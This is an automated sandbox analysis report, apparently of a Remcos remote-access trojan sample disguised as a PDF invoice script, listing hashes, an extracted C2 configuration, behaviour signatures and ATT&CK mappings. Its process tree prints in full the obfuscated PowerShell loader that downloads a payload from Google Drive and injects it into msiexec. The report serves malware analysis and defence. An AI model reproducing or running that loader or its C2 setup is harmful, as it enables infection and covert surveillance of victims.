remcos | e4ea11f5460a15c91a45fab777cdef0c3245e732a41f2f485e2d7bfdd989f9be

General

Target

A1_racun_09-2024·pdf.vbs
Size

72KB
MD5

75c46eded8d56cffa52b4bf86615c200
SHA1

8519d8a27d4663d6c3c70991c0cc757d16790b4e
SHA256

8e1d67ca2d0e0003ed384472bc64f1c659ea0433539b821203c7e4d42b5efe18
SHA512

3732e3bb921c00dd67d9f630b6638ec05aa097a4e7b4ffdb7344014ee9ba74d8924db42f1d6789577529573bbfca03394cde3e81d4253dd013dcbb2833a07d8d
SSDEEP

1536:sBg98qp1hVcA8ACb+p3HzYxZ+cBvSnAnO70P5XIf:si9fvAAO+lcBanCOZf

Score

10^/10

remcos remotehost discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-WDQFG0
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 9 IoCs

flow	pid	Process
5	1908	powershell.exe
7	1908	powershell.exe
9	2468	msiexec.exe
11	2468	msiexec.exe
13	2468	msiexec.exe
15	2468	msiexec.exe
16	2468	msiexec.exe
18	2468	msiexec.exe
20	2468	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1908	powershell.exe
2900	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2468	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2900	powershell.exe
2468	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1908	powershell.exe
2900	powershell.exe
2900	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2900	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	2900	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2468	msiexec.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 1968 wrote to memory of 1908	1968	WScript.exe	30
PID 1968 wrote to memory of 1908	1968	WScript.exe	30
PID 1968 wrote to memory of 1908	1968	WScript.exe	30
PID 2900 wrote to memory of 2468	2900	powershell.exe	36
PID 2900 wrote to memory of 2468	2900	powershell.exe	36
PID 2900 wrote to memory of 2468	2900	powershell.exe	36
PID 2900 wrote to memory of 2468	2900	powershell.exe	36
PID 2900 wrote to memory of 2468	2900	powershell.exe	36
PID 2900 wrote to memory of 2468	2900	powershell.exe	36
PID 2900 wrote to memory of 2468	2900	powershell.exe	36
PID 2900 wrote to memory of 2468	2900	powershell.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A1_racun_09-2024·pdf.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bedstemorens Tweets sautes Reweaving Bldt #>;$Sigten='Precelebrant';<#Opisthographal Uncurious Sumdum Oratorially Nonreligiously Bronkitisserne #>;$Erogen=$host.PrivateData;If ($Erogen) {$Blgedalenes++;}function Udligningsbelbene($Fatuity52){$Skiff42=$Bethank+$Fatuity52.Length-$Blgedalenes;for( $Wienerinder=5;$Wienerinder -lt $Skiff42;$Wienerinder+=6){$gedeskindenes='Slder';$Forsamledes+=$Fatuity52[$Wienerinder];}$Forsamledes;}function Dunne($Pulik){ . ($Knaphulsstings) ($Pulik);}$Salinities=Udligningsbelbene 'FrizzMDisowo DiaczUninviCunenlMi aslCarboaMokke/Param5Germa. Aus,0Mblet Schi,(WaterWBr dbiEng gntilhudHjspnoSuscewTemposUd.ke ClumpNRe deTIntel Brome1Balst0Subre.A oni0Tidsb; ,les NonarWStjeriLecitn Bodr6 Trl 4Flyvr;Doate F senx i co6.mphi4 Soli;.otal AbomarMankivKnst :kl ss1Forul2Pl ds1Sintr.Toers0 pka)N cki Eru tG LommeOpiumcTanglkDebtsoViros/Beska2Geolo0U.dra1Omvi 0Abbre0 ampr1Konto0Hemat1Lan,l RapmbF aneniLukrzrGuanoeSkottf,orveo P.scx Para/Excit1trykn2Brneh1 duis.Plove0 Petr ';$zymotize=Udligningsbelbene 'dic cUErkynsRaideETimbeRBukse- Pis,aUdtaggMiddlEmi liNOribatSubsu ';$Distriktsblade121=Udligningsbelbene 'Foggih En stAccort bahupSemimsExami:Micro/Totur/EjenddNonprr nwomiF derv sbjeeTehue.HandlgSummeo BistoStarcg MrkelLiggeeEpipl. LaurcSemiboNeshnmCoedu/ GroguBiophc data? Udk,eDerivxCastap KrumoSamfur PasttCon,r=Maskid enfaoMe etwExa tnRetr l Rej o Couna ugtidPlanl&HotdoiDimind .ecu=Ropis1GrundWForelnSamd KAttri9B.oloxSlutnw N,wtoProseHVater6KatedBOperoPTogbeVGlauco etallSpidsxHe.erVplagerTen oRTilraKReligVUnterF Hov OBoldk4,arkexTendeI VeroXInstrJImperaWendioShankpAf ra7LengtrVarmh ';$Aquatones=Udligningsbelbene 'Volie>Peziz ';$Knaphulsstings=Udligningsbelbene 'K.llaIFrankEU.chaX.atte ';$Brislers='Raastofmangelens';$Plowed='\Tungebaand.Oly';Dunne (Udligningsbelbene ' N.tr$ PrevgSecu l Cygnostak bSkud abag il Nonv:Fort aUnheusKonfofAkslea DomfltapewtBankkeCano rRegule dri tMeni = xcla$Cloc eAfpron For,v Fris: Pl.raSkridpArt cpKvrked lasuaSneaptSisteaAnted+Pregr$sterePUnacclMisa oOp rkw redieGoo ydafd a ');Dunne (Udligningsbelbene ' tema$DownhgSambhlSigj.oByerhbSignaa,ekselPer o:ZircoOCou aoGive nAddretBibli=Slkni$ S bnDYd rli Kar.s rastMcknirWeakfiMetank Ra et,lodpsfjogtb malalTib raRedssd ideneScen,1,melt2 bibe1Peb.l.f lmosAftrap Cobaltomgaian setPaneg(Ar.ej$SurliASundeq GodsuT,nkbaHonortMadlaoSrbotnLathdeVildesFl.pp)Ba el ');Dunne (Udligningsbelbene '.reye[SludaN Ba eeConsttTerrn.ValutSBurnie .ichrCratcvI,tegiBarylc Ex oeignazP Betho CybeiOmordnOutletIndtgMn viga StvsnH lomaRaastgDeclae MacrrEn ea]kines:Vedtg:A magSNi,roe LtnicMinisuRy eprFals,i YenstSerowyRackaPFatter Prinotr lltRameqoMycetcNonimoNons lFi tl Bd i=Tegng Avit.[ HydrN Ov reKapact Impo. RubeSCe,eveFundhcSubpruBoodlrmerskiPylort antyBylanPReal,rB uehoFlas tBismaoR ligcBiddeo FastlH lefT,tofmySagtmp PaineOv,ra] ogeb:Catal:Hjer TRealilKortssKokke1Landb2Endot ');$Distriktsblade121=$Oont[0];$Obtund=(Udligningsbelbene 'R pag$UneclGNaturlHeptyo,roodbCr ssAComprL redi:HeiniELighelFeminIintermRuddliStemmnOrrhoENonp.RNonseiCountNMakroGDioceEPearlRDolesN AirsETypalSIndla=WhirlnPartoESr.gnw Hell-Imp cOSlagsbpremiJ rintETndehCcomprTNedfo klftnsAltstyWeepis mel,TApokaeDrikfm Mo,n. Ko oNRntgeESlg ntAvert. iplawM ldieIngveBBadmic NytaLKust,IlrdomEShithNFrek.TK gep ');Dunne ($Obtund);Dunne (Udligningsbelbene 'Aff t$PolicE.hinil fhei KrnemS ilii Zionnl,gere.ndrir ggriblu.bnRewhigEn.gme ndtgr FlamnVagtpePolytsEndos.Vi trHAerose Unreaafterdpr,foePr,prrD.scis Afho[Lns i$Bec ezTempeyOpacim lippoVensktTelefiStemmzOms ee.udsf]tandr= Land$MozinSLgemiaSmu llAntediEnantn SpdbiMetabtP esciP inteGru tsBerga ');$Studfishes=Udligningsbelbene 'Halmv$CentrEEst dlBetini IsohmTotaliTi kpnSibyle nthrrBroafiSt esnAfblogD nateMdeplr.husenTabe.e laybsDisma. ErhvDZamb o HouswHaemonIn erl ornioKerataRefordMemenFLa.dli tol lImposeBohrm( Aads$FigurDFrokoiUn,las Ark,t IgbirFejldiUniplk Paast Thias rtifbRefo l MultaS oerd PrineTa pi1Fuld.2Okker1Livsv,Axega$ Syb.MReve iAnekdc SargrUpta oFo eph DoboiEfte,sMen etAblaso.roprlMonegoArro gt ilwyHandi)Knipl ';$Microhistology=$asfalteret;Dunne (Udligningsbelbene 'Still$T tmagBlokilChickoBetydBMoreiaKommaLmikro: IndkBmo,ilrNutilk RaagSA kapt,orseRDi maeSpaltg Arbee SpinNMilja= Deci( GelnTForf EMur.esSki.pTRab,l-S rotPSetouA awaitW tchHtost krigs$ AntiMMimreIE,ihiCPladsRChromo AbonhKohreiStjplSslrepTS ammOCirculSvumnoAnimagGeonoyHuman)Bas i ');while (!$Brkstregen) {Dunne (Udligningsbelbene 'Inter$Restag,ropylIndivoNststbbog,yaSmittlCereb:StatiLImp daUd ykm Sk tpTempoe Fl t=Finan$kastrt Teknr FaluuFolkee iger ') ;Dunne $Studfishes;Dunne (Udligningsbelbene 'Bev tSPh.set AlefaH.rnerGauditSuper-O ersSHyperlSh,pbeElsdyeDrivfpChair S bem4 onex ');Dunne (Udligningsbelbene ' Gyms$Hede.gRsterlJobsko.xittb mallaPrinclYde l: FrdiB TromrStbolkinflas Ophit HavorSdceletegnsgHydr eEkskonPjatt=P,sit(GalsiTUnf ce FishsBajontFlise-KipchPEftera GenatPhotoh Bun Afve,$Leis,MBeveliSheddcAmphirTomfoo nacah Hypoi Tunes Const Inn,o ismol ithio frangtsendy ellb)Brewt ') ;Dunne (Udligningsbelbene 'Forli$SkralgBlomslReiv.o genb tilkaHe.tellongo:PileoRNympheContrt SpiriDadeln,regotS,mareSk.lddTrold=Sci.p$ iewg Jernl ebroRegnfbBogtiaIdentlKapac:Span F KnucaAnkyluBesttnKlynkaLejevt Kbete,cerndOvers1Nonac9Bes.e7Bylde+Quart+ Trea%Disbu$adjunOTurntoE,ochn Dh.bttrans.OplyscUnem oembr,u Folkn aletJenop ') ;$Distriktsblade121=$Oont[$Retinted];}$Faglrereksaminerne=306046;$Jumpers=31093;Dunne (Udligningsbelbene 'Snebl$ScrewgHeptalinhe oBagerb LeodaUpknilRebet:SidelVwi doitredjdKelloe,agttonaesttBjarke gentxSclert nder Telev=Bifil u docGhklineForurtT.gns-gorheCArmhuo,ensinProbltRomanep eben ConvtDrags Mir.$DecedM Shrii RisqcinfirrglycioAfterhBelgniSlar s,nbehtT,edbo Jal lKata,o UndegNdig yTunin ');Dunne (Udligningsbelbene 'Blads$UnglugJailhlPrivao Ico bReproas,mmelOpina: Woo R Chroeknarrn EdelgMasturKittliElatonDesorgSlj,ssBrnesmAmbitiRep,td ,tuddJacuaeCa.sulBols f irkua Her bSakarrRetu i B.kekUrofuaE,holn Bri tP,oceeesphrr Div nS gene To,dsa,kyl Olie =Prfe Hypod[OmbudSKon.ly Elo sGrammtSondeeFejlsmSubge.BademCAnnonoRakisnS ppev Eri eStuntr Eurotbu ge]Ep sy:Huma :Dimi.FstrumrbesvaoB igemPhyllBJernvaChocos.idude Sulk6Pre.e4 goleSKontotFreelrArauci P asnLea agBesig(Jazze$EinegVMazo i sl pdNewtoeSpyt o rikttBarefeFoldnx Ust,t Scan)Kanva ');Dunne (Udligningsbelbene 'Dis r$Kaldeg hiffl StriostivnbAutova.yanslPurit: UjvnsVandbpNytaaeAbrikn F gkcReubee Unorra,idlk.utnaj CepeoSala l,itche EthnrC.mon Seneg= Cy,o Holos[H.steSSynchy Tilts.rosstEnd.ceWoo bmS rut.Tn stT ParaeDisenxDep,otS nco. HjttEConfinS owfcUntiroUninudStithiFuld n ForvgAntnd]Cirr :Tampn:TabueA LaveS TwinCKu stIIndefIUvs,n.BreakGAlleye G netWiattSOvervtMargir MisliTaxomn,kandgSagfr( Toil$Ib,riROxideeTypebnAttingLarinrSawtoiDuedonflatbg EpissRegiomP stei KopidHea adsjle.eGuld,l Bo bfHaandaKontobKomfor nalyiAnmelk HusuaKnsttn Ihrdt,ukeye rierAntifnmelleeInd.os ongh) Test ');Dunne (Udligningsbelbene ' Octo$Pyridg,actel,birroT thob Ord a Panpl Ess,:M rciNtetryoRel anDyre eGoplexSchedpMonola PengnTrlgnsFrosciEloinvAdusteSup rnSprineConars ootsSvejf= Par $Loques An lpdw rfeSalamnPterocSextueDorharSkurkkBrogajUnc,ro lammlRecroe unstr Auxi.NonprsHex.guPas abCh issPro ctHesper LogwiAktivnSti pgAf en( nsha$sulciF Dec.aFjantgBehanlPseudrKnalde A.tsrStoryeMaattk,oldks,nhecaR spem,aleoiMars nR.hineDyslerB olon Siouenonp , Warr$ MothJDam,suTyt emTotalpB smaeProcorSvindsTrane)Ussrm ');Dunne $Nonexpansiveness;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bedstemorens Tweets sautes Reweaving Bldt #>;$Sigten='Precelebrant';<#Opisthographal Uncurious Sumdum Oratorially Nonreligiously Bronkitisserne #>;$Erogen=$host.PrivateData;If ($Erogen) {$Blgedalenes++;}function Udligningsbelbene($Fatuity52){$Skiff42=$Bethank+$Fatuity52.Length-$Blgedalenes;for( $Wienerinder=5;$Wienerinder -lt $Skiff42;$Wienerinder+=6){$gedeskindenes='Slder';$Forsamledes+=$Fatuity52[$Wienerinder];}$Forsamledes;}function Dunne($Pulik){ . ($Knaphulsstings) ($Pulik);}$Salinities=Udligningsbelbene 'FrizzMDisowo DiaczUninviCunenlMi aslCarboaMokke/Param5Germa. Aus,0Mblet Schi,(WaterWBr dbiEng gntilhudHjspnoSuscewTemposUd.ke ClumpNRe deTIntel Brome1Balst0Subre.A oni0Tidsb; ,les NonarWStjeriLecitn Bodr6 Trl 4Flyvr;Doate F senx i co6.mphi4 Soli;.otal AbomarMankivKnst :kl ss1Forul2Pl ds1Sintr.Toers0 pka)N cki Eru tG LommeOpiumcTanglkDebtsoViros/Beska2Geolo0U.dra1Omvi 0Abbre0 ampr1Konto0Hemat1Lan,l RapmbF aneniLukrzrGuanoeSkottf,orveo P.scx Para/Excit1trykn2Brneh1 duis.Plove0 Petr ';$zymotize=Udligningsbelbene 'dic cUErkynsRaideETimbeRBukse- Pis,aUdtaggMiddlEmi liNOribatSubsu ';$Distriktsblade121=Udligningsbelbene 'Foggih En stAccort bahupSemimsExami:Micro/Totur/EjenddNonprr nwomiF derv sbjeeTehue.HandlgSummeo BistoStarcg MrkelLiggeeEpipl. LaurcSemiboNeshnmCoedu/ GroguBiophc data? Udk,eDerivxCastap KrumoSamfur PasttCon,r=Maskid enfaoMe etwExa tnRetr l Rej o Couna ugtidPlanl&HotdoiDimind .ecu=Ropis1GrundWForelnSamd KAttri9B.oloxSlutnw N,wtoProseHVater6KatedBOperoPTogbeVGlauco etallSpidsxHe.erVplagerTen oRTilraKReligVUnterF Hov OBoldk4,arkexTendeI VeroXInstrJImperaWendioShankpAf ra7LengtrVarmh ';$Aquatones=Udligningsbelbene 'Volie>Peziz ';$Knaphulsstings=Udligningsbelbene 'K.llaIFrankEU.chaX.atte ';$Brislers='Raastofmangelens';$Plowed='\Tungebaand.Oly';Dunne (Udligningsbelbene ' N.tr$ PrevgSecu l Cygnostak bSkud abag il Nonv:Fort aUnheusKonfofAkslea DomfltapewtBankkeCano rRegule dri tMeni = xcla$Cloc eAfpron For,v Fris: Pl.raSkridpArt cpKvrked lasuaSneaptSisteaAnted+Pregr$sterePUnacclMisa oOp rkw redieGoo ydafd a ');Dunne (Udligningsbelbene ' tema$DownhgSambhlSigj.oByerhbSignaa,ekselPer o:ZircoOCou aoGive nAddretBibli=Slkni$ S bnDYd rli Kar.s rastMcknirWeakfiMetank Ra et,lodpsfjogtb malalTib raRedssd ideneScen,1,melt2 bibe1Peb.l.f lmosAftrap Cobaltomgaian setPaneg(Ar.ej$SurliASundeq GodsuT,nkbaHonortMadlaoSrbotnLathdeVildesFl.pp)Ba el ');Dunne (Udligningsbelbene '.reye[SludaN Ba eeConsttTerrn.ValutSBurnie .ichrCratcvI,tegiBarylc Ex oeignazP Betho CybeiOmordnOutletIndtgMn viga StvsnH lomaRaastgDeclae MacrrEn ea]kines:Vedtg:A magSNi,roe LtnicMinisuRy eprFals,i YenstSerowyRackaPFatter Prinotr lltRameqoMycetcNonimoNons lFi tl Bd i=Tegng Avit.[ HydrN Ov reKapact Impo. RubeSCe,eveFundhcSubpruBoodlrmerskiPylort antyBylanPReal,rB uehoFlas tBismaoR ligcBiddeo FastlH lefT,tofmySagtmp PaineOv,ra] ogeb:Catal:Hjer TRealilKortssKokke1Landb2Endot ');$Distriktsblade121=$Oont[0];$Obtund=(Udligningsbelbene 'R pag$UneclGNaturlHeptyo,roodbCr ssAComprL redi:HeiniELighelFeminIintermRuddliStemmnOrrhoENonp.RNonseiCountNMakroGDioceEPearlRDolesN AirsETypalSIndla=WhirlnPartoESr.gnw Hell-Imp cOSlagsbpremiJ rintETndehCcomprTNedfo klftnsAltstyWeepis mel,TApokaeDrikfm Mo,n. Ko oNRntgeESlg ntAvert. iplawM ldieIngveBBadmic NytaLKust,IlrdomEShithNFrek.TK gep ');Dunne ($Obtund);Dunne (Udligningsbelbene 'Aff t$PolicE.hinil fhei KrnemS ilii Zionnl,gere.ndrir ggriblu.bnRewhigEn.gme ndtgr FlamnVagtpePolytsEndos.Vi trHAerose Unreaafterdpr,foePr,prrD.scis Afho[Lns i$Bec ezTempeyOpacim lippoVensktTelefiStemmzOms ee.udsf]tandr= Land$MozinSLgemiaSmu llAntediEnantn SpdbiMetabtP esciP inteGru tsBerga ');$Studfishes=Udligningsbelbene 'Halmv$CentrEEst dlBetini IsohmTotaliTi kpnSibyle nthrrBroafiSt esnAfblogD nateMdeplr.husenTabe.e laybsDisma. ErhvDZamb o HouswHaemonIn erl ornioKerataRefordMemenFLa.dli tol lImposeBohrm( Aads$FigurDFrokoiUn,las Ark,t IgbirFejldiUniplk Paast Thias rtifbRefo l MultaS oerd PrineTa pi1Fuld.2Okker1Livsv,Axega$ Syb.MReve iAnekdc SargrUpta oFo eph DoboiEfte,sMen etAblaso.roprlMonegoArro gt ilwyHandi)Knipl ';$Microhistology=$asfalteret;Dunne (Udligningsbelbene 'Still$T tmagBlokilChickoBetydBMoreiaKommaLmikro: IndkBmo,ilrNutilk RaagSA kapt,orseRDi maeSpaltg Arbee SpinNMilja= Deci( GelnTForf EMur.esSki.pTRab,l-S rotPSetouA awaitW tchHtost krigs$ AntiMMimreIE,ihiCPladsRChromo AbonhKohreiStjplSslrepTS ammOCirculSvumnoAnimagGeonoyHuman)Bas i ');while (!$Brkstregen) {Dunne (Udligningsbelbene 'Inter$Restag,ropylIndivoNststbbog,yaSmittlCereb:StatiLImp daUd ykm Sk tpTempoe Fl t=Finan$kastrt Teknr FaluuFolkee iger ') ;Dunne $Studfishes;Dunne (Udligningsbelbene 'Bev tSPh.set AlefaH.rnerGauditSuper-O ersSHyperlSh,pbeElsdyeDrivfpChair S bem4 onex ');Dunne (Udligningsbelbene ' Gyms$Hede.gRsterlJobsko.xittb mallaPrinclYde l: FrdiB TromrStbolkinflas Ophit HavorSdceletegnsgHydr eEkskonPjatt=P,sit(GalsiTUnf ce FishsBajontFlise-KipchPEftera GenatPhotoh Bun Afve,$Leis,MBeveliSheddcAmphirTomfoo nacah Hypoi Tunes Const Inn,o ismol ithio frangtsendy ellb)Brewt ') ;Dunne (Udligningsbelbene 'Forli$SkralgBlomslReiv.o genb tilkaHe.tellongo:PileoRNympheContrt SpiriDadeln,regotS,mareSk.lddTrold=Sci.p$ iewg Jernl ebroRegnfbBogtiaIdentlKapac:Span F KnucaAnkyluBesttnKlynkaLejevt Kbete,cerndOvers1Nonac9Bes.e7Bylde+Quart+ Trea%Disbu$adjunOTurntoE,ochn Dh.bttrans.OplyscUnem oembr,u Folkn aletJenop ') ;$Distriktsblade121=$Oont[$Retinted];}$Faglrereksaminerne=306046;$Jumpers=31093;Dunne (Udligningsbelbene 'Snebl$ScrewgHeptalinhe oBagerb LeodaUpknilRebet:SidelVwi doitredjdKelloe,agttonaesttBjarke gentxSclert nder Telev=Bifil u docGhklineForurtT.gns-gorheCArmhuo,ensinProbltRomanep eben ConvtDrags Mir.$DecedM Shrii RisqcinfirrglycioAfterhBelgniSlar s,nbehtT,edbo Jal lKata,o UndegNdig yTunin ');Dunne (Udligningsbelbene 'Blads$UnglugJailhlPrivao Ico bReproas,mmelOpina: Woo R Chroeknarrn EdelgMasturKittliElatonDesorgSlj,ssBrnesmAmbitiRep,td ,tuddJacuaeCa.sulBols f irkua Her bSakarrRetu i B.kekUrofuaE,holn Bri tP,oceeesphrr Div nS gene To,dsa,kyl Olie =Prfe Hypod[OmbudSKon.ly Elo sGrammtSondeeFejlsmSubge.BademCAnnonoRakisnS ppev Eri eStuntr Eurotbu ge]Ep sy:Huma :Dimi.FstrumrbesvaoB igemPhyllBJernvaChocos.idude Sulk6Pre.e4 goleSKontotFreelrArauci P asnLea agBesig(Jazze$EinegVMazo i sl pdNewtoeSpyt o rikttBarefeFoldnx Ust,t Scan)Kanva ');Dunne (Udligningsbelbene 'Dis r$Kaldeg hiffl StriostivnbAutova.yanslPurit: UjvnsVandbpNytaaeAbrikn F gkcReubee Unorra,idlk.utnaj CepeoSala l,itche EthnrC.mon Seneg= Cy,o Holos[H.steSSynchy Tilts.rosstEnd.ceWoo bmS rut.Tn stT ParaeDisenxDep,otS nco. HjttEConfinS owfcUntiroUninudStithiFuld n ForvgAntnd]Cirr :Tampn:TabueA LaveS TwinCKu stIIndefIUvs,n.BreakGAlleye G netWiattSOvervtMargir MisliTaxomn,kandgSagfr( Toil$Ib,riROxideeTypebnAttingLarinrSawtoiDuedonflatbg EpissRegiomP stei KopidHea adsjle.eGuld,l Bo bfHaandaKontobKomfor nalyiAnmelk HusuaKnsttn Ihrdt,ukeye rierAntifnmelleeInd.os ongh) Test ');Dunne (Udligningsbelbene ' Octo$Pyridg,actel,birroT thob Ord a Panpl Ess,:M rciNtetryoRel anDyre eGoplexSchedpMonola PengnTrlgnsFrosciEloinvAdusteSup rnSprineConars ootsSvejf= Par $Loques An lpdw rfeSalamnPterocSextueDorharSkurkkBrogajUnc,ro lammlRecroe unstr Auxi.NonprsHex.guPas abCh issPro ctHesper LogwiAktivnSti pgAf en( nsha$sulciF Dec.aFjantgBehanlPseudrKnalde A.tsrStoryeMaattk,oldks,nhecaR spem,aleoiMars nR.hineDyslerB olon Siouenonp , Warr$ MothJDam,suTyt emTotalpB smaeProcorSvindsTrane)Ussrm ');Dunne $Nonexpansiveness;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2900
- C:\Windows\syswow64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
6232956349ef426d4f27c3956e41b79b

SHA1
e2f3c8025caeaee31a2ef7a3097b13c89a7c8143

SHA256
d1a3f9b71de43b56ba3f4c6e95f0ff00a1430148e564a4cc4fa582ae69a4eb58

SHA512
a48352158af0808a77cae342e91dad97dbcbe8c8ea0b79429d64a4ad95f6d57bcaf9d9147a638b66ae3c4844d5d7f8391d0f27277197889041a134d71dac5a5b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MUGSIIMCP3FMT9PHP84J.temp

Filesize
7KB

MD5
42aca8ad38a477a51edf6b48d8eee443

SHA1
4ee6340dd5648d96de976dad683fad4b50b07f1f

SHA256
4ff421ae8787b7fab19e38732b18a0ed7c1c16a33293c35b4657a11c07ed9a32

SHA512
c198df6460431c8bb44ace6a8b0343afe20bd22baa329e599caf385f0d86ef8248bf1ac964facd9667960d4e27d9eabffb44a1dfc552a424c77ef4bb0a1fc636

Download Submit
C:\Users\Admin\AppData\Roaming\Tungebaand.Oly

Filesize
438KB

MD5
0743eaf070a6ca9050b3c77dc3ce4e17

SHA1
10bca95e76500e62c55e184ecbfbd9c41b21e4ec

SHA256
79481ee789ec7e7da046d266e6b3628e666aff76bc57213ffcadfbd5900f7503

SHA512
2024f6b23068a9b4e5dffdab6a4acd490da8ede8990fe18d13e0bbfff47918e475489bb5f1c18f54fb5a1d8e998e1625477facbe7cf45e5c28dcd4c4885ce321

Download Submit
memory/1908-8-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/1908-16-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/1908-9-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/1908-10-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/1908-11-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/1908-13-0x000007FEF5B8E000-0x000007FEF5B8F000-memory.dmp

Filesize
4KB

Download
memory/1908-14-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/1908-4-0x000007FEF5B8E000-0x000007FEF5B8F000-memory.dmp

Filesize
4KB

Download
memory/1908-6-0x00000000022A0000-0x00000000022A8000-memory.dmp

Filesize
32KB

Download
memory/1908-7-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/1908-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download
memory/2468-40-0x0000000000230000-0x0000000001292000-memory.dmp

Filesize
16.4MB

Download
memory/2468-41-0x0000000000230000-0x0000000001292000-memory.dmp

Filesize
16.4MB

Download
memory/2900-20-0x0000000006740000-0x000000000AFF6000-memory.dmp

Filesize
72.7MB

Download

Analysis

Sharing